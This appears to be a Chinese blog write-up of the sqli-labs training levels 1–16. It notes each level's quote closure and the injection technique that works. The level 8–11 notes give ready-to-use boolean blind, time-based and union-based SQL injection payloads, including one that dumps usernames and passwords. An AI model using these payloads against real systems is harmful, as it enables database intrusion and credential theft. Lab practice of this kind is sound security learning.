less-1
步骤如下:
less-2:
由上面得知,为数字型注入。其余步骤与第一题一致。
less-3:
由于用‘ 闭合后,输入order by 仍然显示错误,则考虑是否是闭合方式不对。
和第一题过程一致,不过闭合方式为’)
less-4
和第一题过程一致,不过闭合方式为“)
less-5
页面无回显,考虑盲注或报错注入。
less-6
和上一题一致,只是用"闭合
less-7
用’))闭合,无回显,判断是不是布尔盲注,
使用burp suite进行盲注,使用burpsuite进行布尔盲注(sqli-labs第7关)_sqli-labs第七关burp-CSDN博客
sqli-labs-----第7关_sqli-labs第七关-CSDN博客
less-8
闭合符为' ,无回显,使用布尔盲注。
or length(database())=8--+
or substr((database()),1,8)='security'--+
or length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=29--+
or substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,29)='emails,referers,uagents,users'--+
or substr((select group_concat(column_name) from information_schema.columns where table_name='emails'),1,1)='i'--+
or substr((select group_concat(id,email_id) from emails),1,1)='1'--+
less-9
不管输入什么,页面回显都一致,考虑时间盲注,
发现输入?id=1' and if(1=1,sleep(5),1)--+,页面会睡眠五秒,则被执行。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
后逐一检测表名,字段名,字段内容。
less-10
用?id=1" and if(1=1,sleep(5),1)--+判断用“还是‘闭合,后得到用”闭合,其次也上题一致。
less-11
为post传参,输入1’ ‘,发现用’ 闭合,发现回显点为第一行,输入1' union select 1,2#,
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
?id=1' union select 1,group_concat(username,password) from users#
less-12
由此得知,用”)闭合,用1" ) or 1=1 #,判断存在sql注入,
其后语句与前面一致。
less-13
用”)闭合,只有登录成功和失败,需要报错注入或盲注。
后续继续进行报错注入。
less-14
用"闭合,布尔盲注或报错注入。
less-15
用'闭合,但不报错,是典型的布尔盲注,因为有错误页面和正确页面进行参考。
less-16
使用")闭合,其余与15一致。
6665
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
